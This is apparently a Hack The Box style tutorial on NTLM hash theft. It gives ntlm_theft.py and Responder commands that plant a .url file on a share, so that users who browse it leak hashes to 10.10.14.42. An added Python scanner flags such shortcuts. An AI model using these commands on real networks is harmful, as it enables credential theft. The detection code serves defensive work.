NTLM Hash Theft

You can drop a file somewhere in the filesystem (for example, on a network share). When a user browses to the directory that contains the file, the file automatically triggers a network request to your computer, which is running Responder and captures the NTLM hash.

Generating the file:

python3 ntlm_theft.py --generate url --server 10.10.14.42 --filename somefilename

Run Responder like this, choosing the correct interface (in this case tun0, for Hack The Box):

sudo responder -I tun0 --analyze
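
A defensive check for the file type generated above, as an added example that is not part of the original page or of ntlm_theft: it walks a directory tree and flags .url shortcuts whose values point at a UNC path or a remote file:// host. The function names, the [InternetShortcut] keys shown and the sample file contents are constructed assumptions.

```python
import os
import re
import tempfile

# Values that make Windows contact another host: \\host\share or file://host/...
# (file:///C:/... is local and is deliberately not matched.)
REMOTE = re.compile(r'^\s*(?:\\\\|file://(?://+)?(?!/))([^\\/\s]+)', re.IGNORECASE)

def remote_refs(text):
    """Return [(key, host)] for key=value lines that reference a remote host."""
    hits = []
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if not sep:
            continue  # section header or blank line
        m = REMOTE.match(value)
        if m:
            hits.append((key.strip(), m.group(1)))
    return hits

def scan_tree(root):
    """Walk root and return {path: [(key, host), ...]} for flagged .url files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".url"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                refs = remote_refs(fh.read())
            if refs:
                findings[path] = refs
    return findings

def demo():
    """Constructed samples: a benign shortcut and one with a remote icon path."""
    benign = "[InternetShortcut]\nURL=https://intranet.example/wiki\n"
    planted = ("[InternetShortcut]\nURL=https://intranet.example/wiki\n"
               "IconIndex=1\nIconFile=\\\\10.10.14.42\\share\\icon.ico\n")
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("wiki.url", benign), ("somefilename.url", planted)):
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return {os.path.basename(p): r for p, r in scan_tree(root).items()}

if __name__ == "__main__":
    print(demo())
```

Point scan_tree at the root of a writable share; any hit whose host is not one of your own file servers deserves a look.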
